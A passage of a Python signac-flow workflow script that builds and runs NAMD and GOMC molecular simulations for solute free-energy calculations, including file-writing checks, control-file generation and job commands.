elif job.doc.namd_node_ngpu == 1:
job.doc.namd_cpu_or_gpu = "GPU"
else:
raise ValueError(
"Tee NAMD CPU and GPU can not be determined as force field (FF) is not available in the selection, "
"or GPU selection is is not 0 or 1."
)
# get the gomc binary paths
if job.doc.gomc_ngpu == 0:
job.doc.gomc_cpu_or_gpu = "CPU"
elif job.doc.gomc_ngpu == 1:
job.doc.gomc_cpu_or_gpu = "GPU"
else:
raise ValueError(
"The GOMC CPU and GPU can not be determined as force field (FF) is not available in the selection, "
"or GPU selection is is not 0 or 1."
)
# set the initial iteration number of the simulation
job.doc.gomc_equilb_design_ensemble_dict = {}
job.doc.gomc_production_run_ensemble_dict = {}
if job.doc.production_ensemble == "NPT":
job.doc.namd_equilb_NPT_gomc_binary_file = f"namd2"
job.doc.gomc_equilb_design_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
job.doc.gomc_production_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
elif job.doc.production_ensemble == "NVT":
job.doc.namd_equilb_NPT_gomc_binary_file = f"namd2"
job.doc.gomc_equilb_design_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
job.doc.gomc_production_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NVT"
else:
raise ValueError(
"ERROR: The 'GCMC', 'GEMC_NVT', 'GEMC_NPT' ensembles is not currently available for this project.py "
)
# ******************************************************
# ******************************************************
# create some initial variable to be store in each jobs
# directory in an additional json file, and test
# to see if they are written (end).
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC psf, pdb, and force field (FF) files were written (start)
# ******************************************************
# ******************************************************
# check if GOMC-MOSDEF wrote the gomc files
# @Project.pre(select_production_ensemble)
@Project.label
@flow.with_job
def mosdef_input_written(job):
"""Check that the mosdef files (psf, pdb, and force field (FF) files) are written ."""
file_written_bool = False
if (
job.isfile(f"{namd_ff_filename_str}.inp")
and job.isfile(f"{gomc_ff_filename_str}.inp")
and job.isfile(
f"{mosdef_structure_box_0_name_str}.psf"
)
and job.isfile(
f"{mosdef_structure_box_0_name_str}.pdb"
)
):
file_written_bool = True
return file_written_bool
# ******************************************************
# ******************************************************
# check if GOMC psf, pdb, and FF files were written (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC control file was written (start)
# ******************************************************
# ******************************************************
# function for checking if the GOMC control file is written
def gomc_control_file_written(job, control_filename_str):
"""General check that the gomc control files are written."""
file_written_bool = False
control_file = f"{control_filename_str}.conf"
if job.isfile(control_file):
with open(job.fn(f"{control_file}"), "r") as fp:
out_gomc = fp.readlines()
for i, line in enumerate(out_gomc):
if "OutputName" in line:
split_move_line = line.split()
if split_move_line[0] == "OutputName":
file_written_bool = True
return file_written_bool
# function for checking if the NAMD control file is written
def namd_control_file_written(job, control_filename_str):
"""General check that the NAMD control files are written."""
file_written_bool = False
control_file = f"{control_filename_str}.conf"
if job.isfile(control_file):
with open(job.fn(f"{control_file}"), "r") as fp:
out_namd = fp.readlines()
for i, line in enumerate(out_namd):
if "cellBasisVector1" in line:
split_move_line = line.split()
if split_move_line[0] == "cellBasisVector1":
file_written_bool = True
return file_written_bool
# checking if the NAMD control file is written for the melt equilb NVT run
@Project.label
@flow.with_job
def part_2a_namd_equilb_NPT_control_file_written(job):
"""General check that the namd_equilb_NPT_control_file
(high temperature to set temp NAMD control file) is written."""
return namd_control_file_written(job, namd_equilb_NPT_control_file_name_str)
# checking if the GOMC control file is written for the equilb run with the selected ensemble
@Project.label
@flow.with_job
def part_2b_gomc_equilb_design_ensemble_control_file_written(job):
"""General check that the gomc_equilb_design_ensemble (run temperature) gomc control file is written."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
gomc_control_file_written(
job,
job.doc.gomc_equilb_design_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"],
)
except:
return False
return True
except:
return False
# checking if the GOMC control file is written for the production run
@Project.label
@flow.with_job
def part_2c_gomc_production_control_file_written(job):
"""General check that the gomc_production_control_file (run temperature) is written."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
return gomc_control_file_written(
job,
job.doc.gomc_production_run_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"],
)
except:
return False
return True
except:
return False
# ******************************************************
# ******************************************************
# check if GOMC control file was written (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC simulations started (start)
# ******************************************************
# ******************************************************
# function for checking if GOMC simulations are started
def gomc_simulation_started(job, control_filename_str):
"""General check to see if the gomc simulation is started."""
output_started_bool = False
if job.isfile("out_{}.dat".format(control_filename_str)) and job.isfile(
"{}_merged.psf".format(control_filename_str)
):
output_started_bool = True
return output_started_bool
# function for checking if NAMD simulations are started
def namd_simulation_started(job, control_filename_str):
"""General check to see if the namd simulation is started."""
output_started_bool = False
if job.isfile("out_{}.dat".format(control_filename_str)) and job.isfile(
"{}.restart.xsc".format(control_filename_str)
):
output_started_bool = True
return output_started_bool
# check if melt equilb_NVT namd run is started
@Project.label
@flow.with_job
def part_3a_output_namd_equilb_NPT_started(job):
"""Check to see if the namd_equilb_NPT_control_file is started
(high temperature to set temperature in NAMD control file)."""
return namd_simulation_started(job, namd_equilb_NPT_control_file_name_str)
# check if equilb_with design ensemble GOMC run is started
@Project.label
@flow.with_job
def part_3b_output_gomc_equilb_design_ensemble_started(job):
"""Check to see if the gomc_equilb_design_ensemble simulation is started (set temperature)."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
if job.isfile(
"out_{}.dat".format(
job.doc.gomc_equilb_design_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"]
)
):
gomc_simulation_started(
job,
job.doc.gomc_equilb_design_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"],
)
else:
return False
except:
return False
return True
except:
return False
# check if production GOMC run is started by seeing if the GOMC consol file and the merged psf exist
@Project.label
@flow.with_job
def part_part_3c_output_gomc_production_run_started(job):
"""Check to see if the gomc production run simulation is started (set temperature)."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
if job.isfile(
"out_{}.dat".format(
job.doc.gomc_production_run_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"]
)
):
gomc_simulation_started(
job,
job.doc.gomc_production_run_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"],
)
else:
return False
except:
return False
return True
except:
return False
# ******************************************************
# ******************************************************
# check if GOMC simulations started (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC and NAMD simulation are completed properly (start)
# ******************************************************
# ******************************************************
# function for checking if GOMC simulations are completed properly
def gomc_sim_completed_properly(job, control_filename_str):
"""General check to see if the gomc simulation was completed properly."""
job_run_properly_bool = False
output_log_file = "out_{}.dat".format(control_filename_str)
if job.isfile(output_log_file):
with open(job.fn(f"{output_log_file}"), "r") as fp:
out_gomc = fp.readlines()
for i, line in enumerate(out_gomc):
if "Move" in line:
split_move_line = line.split()
if (
split_move_line[0] == "Move"
and split_move_line[1] == "Type"
and split_move_line[2] == "Mol."
and split_move_line[3] == "Kind"
):
job_run_properly_bool = True
else:
job_run_properly_bool = False
return job_run_properly_bool
# function for checking if NAMD simulations are completed properly
def namd_sim_completed_properly(job, control_filename_str):
"""General check to see if the namd simulation was completed properly."""
job_run_properly_bool = False
output_log_file = "out_{}.dat".format(control_filename_str)
if job.isfile(output_log_file):
with open(job.fn(f"{output_log_file}"), "r") as fp:
out_namd = fp.readlines()
for i, line in enumerate(out_namd):
if "WallClock:" in line:
split_move_line = line.split()
if (split_move_line[0] == "WallClock:"
and split_move_line[2] == "CPUTime:"
and split_move_line[4] == "Memory:"
):
job_run_properly_bool = True
else:
job_run_properly_bool = False
return job_run_properly_bool
# check if melt equilb NVT GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4a_job_namd_equilb_NPT_completed_properly(job):
"""Check to see if the namd_equilb_NPT_control_file was completed properly
(high temperature to set temperature NAMD control file)."""
x = namd_sim_completed_properly(
job, namd_equilb_NPT_control_file_name_str
)
#print(f'namd check = {x}')
return namd_sim_completed_properly(
job, namd_equilb_NPT_control_file_name_str
)
# check if equilb selected ensemble GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4b_job_gomc_equilb_design_ensemble_completed_properly(job):
"""Check to see if the gomc_equilb_design_ensemble simulation was completed properly (set temperature)."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
filename_4b_iter = job.doc.gomc_equilb_design_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"]
if gomc_sim_completed_properly(
job,
filename_4b_iter,
) is False:
print("gomc_equilb_design_ensemble incomplete state " + str(initial_state_i))
return False
except:
return False
return True
except:
return False
# check if production GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4c_job_production_run_completed_properly(job):
"""Check to see if the gomc production run simulation was completed properly (set temperature)."""
try:
for initial_state_i in list(job.doc.InitialState_list):
try:
filename_4c_iter = job.doc.gomc_production_run_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"]
if gomc_sim_completed_properly(
job,
filename_4c_iter,
) is False:
print("Isn't finished ",filename_4c_iter)
return False
# check specifically for the FE files
if job.isfile(f'Free_Energy_BOX_0_{filename_4c_iter}.dat') is False:
print("Isn't finished ",f'Free_Energy_BOX_0_{filename_4c_iter}.dat')
return False
except:
return False
return True
except:
return False
# ******************************************************
# ******************************************************
# check if GOMC and NAMD simulation are completed properly (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC anaylsis is completed properly (start)
# ******************************************************
# ******************************************************
# check if analysis is done for the individual replicates wrote the gomc files
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.label
@flow.with_job
def part_5a_analysis_individual_simulation_averages_completed(job):
"""Check that the individual simulation averages files are written ."""
file_written_bool = False
if (
job.isfile(
f"{output_replicate_txt_file_name_box_0}"
)
):
file_written_bool = True
return file_written_bool
# check if analysis for averages of all the replicates is completed
@Project.pre(part_5a_analysis_individual_simulation_averages_completed)
@Project.label
def part_5b_analysis_replica_averages_completed(*jobs):
"""Check that the simulation replicate average and std. dev. files are written."""
file_written_bool_list = []
all_file_written_bool_pass = False
for job in jobs:
file_written_bool = False
if (
job.isfile(
f"../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}"
)
):
file_written_bool = True
file_written_bool_list.append(file_written_bool)
if False not in file_written_bool_list:
all_file_written_bool_pass = True
return all_file_written_bool_pass
# ******************************************************
# ******************************************************
# check if GOMC anaylsis is completed properly (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# build system, with option to write the force field (force field (FF)), pdb, psf files.
# Note: this is needed to write GOMC control file, even if a restart (start)
# ******************************************************
# build system
def build_charmm(job, write_files=True):
"""Build the Charmm object and potentially write the pdb, psd, and force field (FF) files."""
print("#**********************")
print("Started: GOMC Charmm Object")
print("#**********************")
mbuild_box_seed_no = job.doc.replica_number_int
solvent = mb.load(smiles_or_mol2[job.doc.solvent]['smiles_or_mol2'],
smiles=smiles_or_mol2[job.doc.solvent]['use_smiles']
)
solvent.name = job.doc.solvent
if job.doc.solvent not in ["TIP4"]:
solvent.energy_minimize(forcefield=forcefield_dict[job.doc.solvent], steps=10 ** 5)
if job.sp.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn"]:
solute = mb.Compound(name=job.doc.solute)
else:
solute = mb.load(smiles_or_mol2[job.sp.solute]['smiles_or_mol2'],
smiles=smiles_or_mol2[job.sp.solute]['use_smiles']
)
solute.name = job.sp.solute
# only put the FF molecules in the simulation in the dictionaly input into the Chamm object.
minimal_forcefield_dict = {solute.name: forcefield_dict[solute.name],
solvent.name: forcefield_dict[solvent.name]
}
solute.energy_minimize(forcefield=forcefield_dict[job.sp.solute], steps=10 ** 5)
bead_to_atom_name_dict = {
"_LP": "LP",
}
residues_list = [solute.name, solvent.name]
print("residues_list = " +str(residues_list ))
if job.doc.solvent in ["TIP4", "TIP3"]:
gomc_fix_bonds_angles_residues_list = [solvent.name]
else:
gomc_fix_bonds_angles_residues_list = None
print('Running: filling liquid box')
box_0 = mb.fill_box(compound=[solute, solvent],
n_compounds=[job.doc.N_liquid_solute, job.doc.N_liquid_solvent],
box=[u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
],
seed=mbuild_box_seed_no
)
print('Completed: filling liquid box')
print('Running: GOMC FF file, and the psf and pdb files')
if job.doc.production_ensemble in ["NVT", "NPT"]:
print('Running: namd_charmm')
namd_charmm = mf_charmm.Charmm(
box_0,
mosdef_structure_box_0_name_str,
structure_box_1=None,
filename_box_1=None,
ff_filename= namd_ff_filename_str,
forcefield_selection=minimal_forcefield_dict,
residues=residues_list,
bead_to_atom_name_dict=bead_to_atom_name_dict,
gomc_fix_bonds_angles=None,
)
print('Running: gomc_charmm')
gomc_charmm = mf_charmm.Charmm(
box_0,
mosdef_structure_box_0_name_str,
structure_box_1=None,
filename_box_1=None,
ff_filename= gomc_ff_filename_str,
forcefield_selection=minimal_forcefield_dict,
residues=residues_list,
bead_to_atom_name_dict=bead_to_atom_name_dict,
gomc_fix_bonds_angles=gomc_fix_bonds_angles_residues_list,
)
else:
raise ValueError("ERROR: The GCMC and GEMC ensembles are not supported in this script.")
if write_files == True:
gomc_charmm.write_inp()
namd_charmm.write_inp()
namd_charmm.write_psf()
namd_charmm.write_pdb()
print("#**********************")
print("Completed: GOMC Charmm Object")
print("#**********************")
return [namd_charmm, gomc_charmm]
# ******************************************************
# ******************************************************
# build system, with option to write the force field (FF), pdb, psf files.
# Note: this is needed to write GOMC control file, even if a restart (end)
# ******************************************************
# ******************************************************
# ******************************************************
# Creating GOMC files (pdb, psf, force field (FF), and gomc control files (start)
# ******************************************************
# ******************************************************
@Project.pre(part_1a_initial_data_input_to_json)
@Project.post(part_2a_namd_equilb_NPT_control_file_written)
@Project.post(part_2b_gomc_equilb_design_ensemble_control_file_written)
@Project.post(part_2c_gomc_production_control_file_written)
@Project.post(mosdef_input_written)
@Project.operation.with_directives(
{
"np": 1,
"ngpu": 0,
"memory": memory_needed,
"walltime": walltime_mosdef_hr,
}
)
@flow.with_job
def build_psf_pdb_ff_gomc_conf(job):
"""Build the Charmm object and write the pdb, psd, and force field (FF)
files for all the simulations in the workspace."""
[namd_charmm_object_with_files, gomc_charmm_object_with_files] = build_charmm(job, write_files=True)
FreeEnergyCalc = [True, int(gomc_free_energy_output_data_every_X_steps)]
MoleculeType = [job.sp.solute, 1]
use_ElectroStatics = True
VDWGeometricSigma = False
Exclude = "1-4"
# common variables
cutoff_style = "VDW"
if cutoff_style != "VDW":
raise ValueError("ERROR: this project is only set up for the SWITCH cutoff style for NAMD"
"and VDW for GOMC. Therefore, the cutoff style selected must be VDW. "
"Rswitch for namd only so the r_switch_dist_start and "
"r_switch_dist_end must be supplied for NAMD. GOMC will then move to VDW "
"with the switch dist (r_switch_dist_start) as the cutoff with LRC.")
production_temperature_K = (job.sp.production_temperature_K * u.K).to_value("K")
production_pressure_bar = (job.doc.production_pressure_bar * u.bar).to_value("bar")
box_lengths_ang = [u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
]
seed_no = job.doc.replica_number_int
namd_template_path_str = os.path.join(project_directory_path, "templates/NAMD_conf_template.conf")
if job.doc.solvent in ["TIP3"] or job.sp.solute in ["TIP3"]:
namd_uses_water = True
namd_water_model = 'tip3'
elif job.doc.solvent in ["TIP4"] or job.sp.solute in ["TIP4"]:
namd_uses_water = True
namd_water_model = 'tip4'
else:
namd_uses_water = False
namd_water_model= None
# generate the namd file
# NOTE: the production and melt temps are converted to intergers so they can be ramped down
# from hot to cool to equilibrate the system.
generate_namd_equilb_control_file(template_path_filename=namd_template_path_str,
namd_path_conf_filename=namd_equilb_NPT_control_file_name_str,
namd_path_file_output_names=namd_equilb_NPT_control_file_name_str,
namd_uses_water=namd_uses_water,
namd_water_model=namd_water_model,
namd_electrostatics_bool=use_ElectroStatics,
namd_vdw_geometric_sigma_bool=VDWGeometricSigma,
namd_psf_path_filename=f"{mosdef_structure_box_0_name_str}.psf",
namd_pdb_path_filename=f"{mosdef_structure_box_0_name_str}.pdb",
namd_ff_path_filename=f"{namd_ff_filename_str}.inp",
namd_production_temp_K= int(production_temperature_K),
namd_production_pressure_bar=production_pressure_bar,
electrostatic_1_4=namd_charmm_object_with_files.coul_1_4,
non_bonded_cutoff=job.doc.Rcut_for_switch_namd_ang,
non_bonded_switch_distance=job.doc.Rcut_ang,
pairlist_distance=job.doc.neighbor_list_dist_namd_ang,
box_lengths=box_lengths_ang,
)
print("#**********************")
print("Completed: namd_equilb_NPT GOMC control file writing")
print("#**********************")
# ******************************************************
# namd_equilb_NPT - psf, pdb, force field (FF) file writing and GOMC control file writing (end)
# ******************************************************
# ******************************************************
# equilb selected_ensemble, if NVT -> NPT - GOMC control file writing (start)
# Note: the control files are written for the max number of gomc_equilb_design_ensemble runs
# so the Charmm object only needs created 1 time.
# ******************************************************
print("#**********************")
print("Started: equilb NPT or GEMC-NVT GOMC control file writing")
print("#**********************")
for initial_state_sims_i in list(job.doc.InitialState_list):
namd_restart_pdb_psf_file_name_str = mosdef_structure_box_0_name_str
restart_control_file_name_str = namd_equilb_NPT_control_file_name_str
output_name_control_file_name = "{}_initial_state_{}".format(
gomc_equilb_design_ensemble_control_file_name_str, initial_state_sims_i
)
job.doc.gomc_equilb_design_ensemble_dict.update(
{
initial_state_sims_i: {
"restart_control_file_name": restart_control_file_name_str,
"output_name_control_file_name": output_name_control_file_name,
}
}
)
# calc MC steps
MC_steps = int(gomc_steps_equilb_design_ensemble)
EqSteps = 1000
# output all data and calc frequecy
output_true_list_input = [
True,
int(gomc_output_data_every_X_steps),
]
output_false_list_input = [
False,
int(gomc_output_data_every_X_steps),
]
if job.doc.solvent in ["TIP4", "TIP3"] \
and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
used_ensemble = "NPT"
if job.doc.production_ensemble in ["NVT", "NPT"]:
VolFreq = (0.01,)
MultiParticleFreq = (None,)
IntraSwapFreq = (0.0,)
CrankShaftFreq = (None,)
SwapFreq = (None,)
DisFreq = (0.39,)
RotFreq = (0.3,)
RegrowthFreq = (0.3,)
else:
raise ValueError(
"Moleules MC move ratios not listed for this solvent and solute or ensemble "
"in the GOMC control file writer."
)
Coordinates_box_0 = "{}.pdb".format(
namd_restart_pdb_psf_file_name_str
)
Structure_box_0 = "{}.psf".format(
namd_restart_pdb_psf_file_name_str
)
binCoordinates_box_0 = "{}.restart.coor".format(
restart_control_file_name_str
)
extendedSystem_box_0 = "{}.restart.xsc".format(
restart_control_file_name_str
)
gomc_control.write_gomc_control_file(
gomc_charmm_object_with_files,
output_name_control_file_name,
used_ensemble,
MC_steps,
production_temperature_K,
ff_psf_pdb_file_directory=None,
check_input_files_exist=False,
Parameters="{}.inp".format(gomc_ff_filename_str),
Restart=True,
RestartCheckpoint=True,
ExpertMode=False,
Coordinates_box_0=Coordinates_box_0,
Structure_box_0=Structure_box_0,
binCoordinates_box_0=binCoordinates_box_0,
extendedSystem_box_0=extendedSystem_box_0,
binVelocities_box_0=None,
Coordinates_box_1=None,
Structure_box_1=None,
binCoordinates_box_1=None,
extendedSystem_box_1=None,
binVelocities_box_1=None,
input_variables_dict={
"PRNG": seed_no,
"Pressure": production_pressure_bar,
"Ewald": use_ElectroStatics,
"ElectroStatic": use_ElectroStatics,
"VDWGeometricSigma": VDWGeometricSigma,
"Rcut": job.doc.Rcut_ang,
"Exclude": Exclude,
"VolFreq": VolFreq[-1],
"MultiParticleFreq": MultiParticleFreq[-1],
"IntraSwapFreq": IntraSwapFreq[-1],
"CrankShaftFreq": CrankShaftFreq[-1],
"SwapFreq": SwapFreq[-1],
"DisFreq": DisFreq[-1],
"RotFreq": RotFreq[-1],
"RegrowthFreq": RegrowthFreq[-1],
"OutputName": output_name_control_file_name,
"EqSteps": EqSteps,
"PressureCalc": output_false_list_input,
"RestartFreq": output_true_list_input,
"CheckpointFreq": output_true_list_input,
"ConsoleFreq": output_true_list_input,
"BlockAverageFreq": output_true_list_input,
"HistogramFreq": output_false_list_input,
"CoordinatesFreq": output_false_list_input,
"DCDFreq": output_true_list_input,
"Potential": cutoff_style,
"LRC": True,
"RcutLow": 0,
"CBMC_First": 12,
"CBMC_Nth": 10,
"CBMC_Ang": 50,
"CBMC_Dih": 50,
"FreeEnergyCalc": FreeEnergyCalc,
"MoleculeType": MoleculeType,
"InitialState": initial_state_sims_i,
"LambdaVDW": list(job.doc.LambdaVDW_list),
# "LambdaCoulomb": None,
},
)
print("#**********************")
print("Completed: equilb NPT or GEMC-NVT GOMC control file writing")
print("#**********************")
# ******************************************************
# equilb selected_ensemble, if NVT -> NPT - GOMC control file writing (end)
# Note: the control files are written for the max number of gomc_equilb_design_ensemble runs
# so the Charmm object only needs created 1 time.
# ******************************************************
# ******************************************************
# production NPT or GEMC-NVT - GOMC control file writing (start)
# ******************************************************
print("#**********************")
print("Started: production NPT or GEMC-NVT GOMC control file writing")
print("#**********************")
output_name_control_file_name = "{}_initial_state_{}".format(
gomc_production_control_file_name_str, initial_state_sims_i
)
restart_control_file_name_str = "{}_initial_state_{}".format(
gomc_equilb_design_ensemble_control_file_name_str, int(initial_state_sims_i)
)
job.doc.gomc_production_run_ensemble_dict.update(
{
initial_state_sims_i: {
"restart_control_file_name": restart_control_file_name_str,
"output_name_control_file_name": output_name_control_file_name,
}
}
)
# calc MC steps
MC_steps = int(gomc_steps_lamda_production)
EqSteps = 1000
# output all data and calc frequecy
output_true_list_input = [
True,
int(gomc_output_data_every_X_steps),
]
output_false_list_input = [
False,
int(gomc_output_data_every_X_steps),
]
if job.doc.solvent in ["TIP4", "TIP3"] \
and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
used_ensemble = job.doc.production_ensemble
if job.doc.production_ensemble in ["NVT", "NPT"]:
if job.doc.production_ensemble in ["NVT"]:
VolFreq = (0.00,)
MultiParticleFreq = (None,)
IntraSwapFreq = (0.0,)
CrankShaftFreq = (None,)
SwapFreq = (None,)
DisFreq = (0.4,)
RotFreq = (0.3,)
RegrowthFreq = (0.3,)
elif job.doc.production_ensemble in ["NPT"]:
VolFreq = (0.01,)
MultiParticleFreq = (None,)
IntraSwapFreq = (0.0,)
CrankShaftFreq = (None,)
SwapFreq = (None,)
DisFreq = (0.39,)
RotFreq = (0.3,)
RegrowthFreq = (0.3,)
else:
raise ValueError(
"Moleules MC move ratios not listed for this solvent and solute or ensemble "
"in the GOMC control file writer."
)
Coordinates_box_0 = "{}_BOX_0_restart.pdb".format(
restart_control_file_name_str
)
Structure_box_0 = "{}_BOX_0_restart.psf".format(
restart_control_file_name_str
)
binCoordinates_box_0 = "{}_BOX_0_restart.coor".format(
restart_control_file_name_str
)
extendedSystem_box_0 = "{}_BOX_0_restart.xsc".format(
restart_control_file_name_str
)
gomc_control.write_gomc_control_file(
gomc_charmm_object_with_files,
output_name_control_file_name,
used_ensemble,
MC_steps,
production_temperature_K,
ff_psf_pdb_file_directory=None,
check_input_files_exist=False,
Parameters="{}.inp".format(gomc_ff_filename_str),
Restart=True,
RestartCheckpoint=True,
ExpertMode=False,
Coordinates_box_0=Coordinates_box_0,
Structure_box_0=Structure_box_0,
binCoordinates_box_0=binCoordinates_box_0,
extendedSystem_box_0=extendedSystem_box_0,
binVelocities_box_0=None,
Coordinates_box_1=None,
Structure_box_1=None,
binCoordinates_box_1=None,
extendedSystem_box_1=None,
binVelocities_box_1=None,
input_variables_dict={
"PRNG": seed_no,
"Pressure": production_pressure_bar,
"Ewald": use_ElectroStatics,
"ElectroStatic": use_ElectroStatics,
"VDWGeometricSigma": VDWGeometricSigma,
"Rcut": job.doc.Rcut_ang,
"Exclude": Exclude,
"VolFreq": VolFreq[-1],
"MultiParticleFreq": MultiParticleFreq[-1],
"IntraSwapFreq": IntraSwapFreq[-1],
"CrankShaftFreq": CrankShaftFreq[-1],
"SwapFreq": SwapFreq[-1],
"DisFreq": DisFreq[-1],
"RotFreq": RotFreq[-1],
"RegrowthFreq": RegrowthFreq[-1],
"OutputName": output_name_control_file_name,
"EqSteps": EqSteps,
"PressureCalc": output_false_list_input,
"RestartFreq": output_true_list_input,
"CheckpointFreq": output_true_list_input,
"ConsoleFreq": output_true_list_input,
"BlockAverageFreq": output_true_list_input,
"HistogramFreq": output_false_list_input,
"CoordinatesFreq": output_false_list_input,
"DCDFreq": output_true_list_input,
"Potential": cutoff_style,
"LRC": True,
"RcutLow": 0,
"CBMC_First": 12,
"CBMC_Nth": 10,
"CBMC_Ang": 50,
"CBMC_Dih": 50,
"FreeEnergyCalc": FreeEnergyCalc,
"MoleculeType": MoleculeType,
"InitialState": initial_state_sims_i,
"LambdaVDW": list(job.doc.LambdaVDW_list),
#"LambdaCoulomb": None,
},
)
print("#**********************")
print("Completed: production NPT or GEMC-NVT GOMC control file writing")
print("#**********************")
# ******************************************************
# production NPT or GEMC-NVT - GOMC control file writing (end)
# ******************************************************
# ******************************************************
# ******************************************************
# Creating GOMC files (pdb, psf, force field (FF), and gomc control files (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# namd_equilb_NPT -starting the NAMD simulations (start)
# ******************************************************
# ******************************************************
@Project.pre(mosdef_input_written)
@Project.pre(part_2a_namd_equilb_NPT_control_file_written)
@Project.post(part_3a_output_namd_equilb_NPT_started)
@Project.post(part_4a_job_namd_equilb_NPT_completed_properly)
@Project.operation.with_directives(
{
"np": lambda job: job.doc.namd_node_ncpu,
"ngpu": lambda job: job.doc.namd_node_ngpu,
"memory": memory_needed,
"walltime": walltime_namd_hr,
}
)
@flow.with_job
@flow.cmd
def run_namd_equilb_NPT_gomc_command(job):
"""Run the namd_equilb_NPT simulation."""
print("#**********************")
print("# Started the run_namd_equilb_NPT_gomc_command.")
print("#**********************")
control_file_name_str = namd_equilb_NPT_control_file_name_str
print(f"Running simulation job id {job}")
run_command = "{}/{} +p{} {}.conf > out_{}.dat".format(
str(namd_binary_path),
str(job.doc.namd_equilb_NPT_gomc_binary_file),
str(job.doc.namd_node_ncpu),
str(control_file_name_str),
str(control_file_name_str),
)
print('namd run_command = ' + str(run_command))
return run_command
# ******************************************************
# ******************************************************
# namd_equilb_NPT -starting the NAMD simulations (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# equilb NPT - starting the GOMC simulation (start)
# ******************************************************
# ******************************************************
for initial_state_j in range(0, number_of_lambda_spacing_including_zero_int):
@Project.pre(part_2a_namd_equilb_NPT_control_file_written)
@Project.pre(part_4a_job_namd_equilb_NPT_completed_properly)
@Project.post(part_3b_output_gomc_equilb_design_ensemble_started)
@Project.post(part_4b_job_gomc_equilb_design_ensemble_completed_properly)
@Project.operation.with_directives(
{
"np": lambda job: job.doc.gomc_ncpu,
"ngpu": lambda job: job.doc.gomc_ngpu,
"memory": memory_needed,
"walltime": walltime_gomc_equilbrium_hr,
},
name = f"gomc_equilb_design_ensemble_initial_state_{initial_state_j}"
)
@flow.with_job
@flow.cmd
def run_equilb_run_gomc_command(job, *, initial_state_j=initial_state_j):
"""Run the gomc_equilb_run_ensemble simulation."""
control_file_name_str = job.doc.gomc_equilb_design_ensemble_dict[
str(initial_state_j)
]["output_name_control_file_name"]
print(f"Running simulation job id {job}")
run_command = "{}/{} +p{} {}.conf > out_{}.dat".format(
str(gomc_binary_path),
str(job.doc.gomc_equilb_design_ensemble_gomc_binary_file),
str(job.doc.gomc_ncpu),
str(control_file_name_str),
str(control_file_name_str),
)
print('gomc equilbrium_run run_command = ' + str(run_command))
return run_command
# *****************************************
# ******************************************************
# equilb NPT - starting the GOMC simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# production run - starting the GOMC simulation (start)
# ******************************************************
# ******************************************************
for initial_state_i in range(0, number_of_lambda_spacing_including_zero_int):
@Project.pre(part_2c_gomc_production_control_file_written)
@Project.pre(part_4b_job_gomc_equilb_design_ensemble_completed_properly)
@Project.post(part_part_3c_output_gomc_production_run_started)
@Project.post(part_4c_job_production_run_completed_properly)
@Project.operation.with_directives(
{
"np": lambda job: job.doc.gomc_ncpu,
"ngpu": lambda job: job.doc.gomc_ngpu,
"memory": memory_needed,
"walltime": walltime_gomc_production_hr,
},
name = f"gomc_production_ensemble_initial_state_{initial_state_i}"
)
@flow.with_job
@flow.cmd
def run_production_run_gomc_command(job, *, initial_state_i=initial_state_i):
"""Run the gomc_production_ensemble simulation."""
control_file_name_str = job.doc.gomc_production_run_ensemble_dict[
str(initial_state_i)
]["output_name_control_file_name"]
print(f"Running simulation job id {job}")
run_command = "{}/{} +p{} {}.conf > out_{}.dat".format(
str(gomc_binary_path),
str(job.doc.gomc_production_ensemble_gomc_binary_file),
str(job.doc.gomc_ncpu),
str(control_file_name_str),
str(control_file_name_str),
)
print('gomc production run_command = ' + str(run_command))
return run_command
# ******************************************************
# ******************************************************
# production run - starting the GOMC simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# data analysis - get the average data from each individual simulation (start)
# ******************************************************
# ******************************************************
@Project.operation.with_directives(
{
"np": 1,
"ngpu": 0,
"memory": memory_needed,
